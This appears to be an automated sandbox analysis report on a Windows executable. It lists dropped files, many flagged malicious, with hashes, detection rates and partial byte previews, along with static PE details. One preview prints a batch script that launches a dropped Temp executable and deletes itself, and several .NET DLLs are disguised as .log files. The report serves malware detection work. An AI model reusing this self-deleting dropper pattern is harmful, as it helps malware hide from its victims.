SHA-512:	DAF709FD80FEC0DCE2858E16CEDE7BE448FCCFD7AE9EC7064D15FB1F1C1BA6AD4BC67836B91057A0C82EFD9C5E699FE40C29168A04B31E12D0558B57E06DD2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\qcUpJGnph9.bat"

C:\Users\user\AppData\Local\Temp\trp9bDSdOf

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tttwPCNoFT

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\BxbrKIuG.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: CPNSQusnwC.exe, Detection: malicious, Browse Filename: Dfim58cp4J.exe, Detection: malicious, Browse Filename: IYXE4Uz61k.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: hjgesadfseawd.exe, Detection: malicious, Browse Filename: kyhjasehs.exe, Detection: malicious, Browse Filename: adjthjawdth.exe, Detection: malicious, Browse Filename: based.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NcCXpyPJ.log

Download File

Process:	C:\Bridgecontainerserver\BrokerhostNet.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QARGDIci.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WFKNZreq.log

Download File

Process:	C:\Bridgecontainerserver\BrokerhostNet.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\aQOwrfcH.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cnLmOXeC.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\foddJTjY.log

Download File

Process:	C:\Bridgecontainerserver\BrokerhostNet.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\pXxtswpF.log

Download File

Process:	C:\Bridgecontainerserver\BrokerhostNet.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\utIZHXKr.log

Download File

Process:	C:\Bridgecontainerserver\BrokerhostNet.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\uznrhtzR.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.629106068702758
Encrypted:	false
SSDEEP:	12:PJJ5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:xTdUOAokItULVDv
MD5:	BC03C4A5F254543E63BFEA72AC5AE703
SHA1:	2D49DFE957B6CCF9FAC4C8235A295C1E0AD1823F
SHA-256:	B8965039327D3031BDDB4094A0803044265907523EAF2143174932EC9660AE23
SHA-512:	5EB204E567D0A4893F63857A099306F802462C76D2A39808CC8BFF9DFDF0C996CB8CE4401056C89248709124AC0B4946C5B780B3627A28803D3981EBC852E92E
Malicious:	false
Preview:	..Pinging 887849 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.491565011258774
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	gkcQYEdJSO.exe
File size:	2'283'768 bytes
MD5:	b5a1474fcb8f7b9809d52546bd304af3
SHA1:	8604fe586fa0d03adaa6608169a62c65c837de7d
SHA256:	dc83dbd12c5a432a6c168982e55d6c7be89dd0bc4b915e3e93e3a97c8af0ab0d
SHA512:	39931300c863c521957dd5d842c0c6e0d66d2b43663136375e21feb26181bd1c9d4494025e0e7a00b80b51405d1e67bfe825787e60c1b99998463b4e3a49a7ee
SSDEEP:	49152:IBJVhKLUy2ich2Y+jCRZCH77sVccM50sF/CwsuVoM:y3hKPFch2YHgbucc00OdoM
TLSH:	FDB5BE2665E14F37C2695A314497003D92A8D7323E62FF1B3A5F24E5A9137B0CE722B7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007F76E47EFFEBh
jmp 00007F76E47EF8FDh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F76E47E2747h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007F76E47F2D8Fh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007F76E47EFA8Ch
push 0000000Ch
push esi
call 00007F76E47EF049h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F76E47E26C2h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F76E47F2849h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F76E47EFA08h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F76E47F282Ch
int3
jmp 00007F76E47F42C7h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0xdff8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x72000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0xdff8	0xe000	ba08fbcd0ed7d9e6a268d75148d9914b	False	0.6373639787946429	data	6.638661032196024	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x72000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x65198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x66cb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x67558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x68400	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x68868	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x69910	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6beb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x70588	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x70358	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x70498	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x70228	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6fef0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6fc98	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x70f68	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x71150	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x71320	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x714d8	0x146	data	English	United States	0.5153374233128835
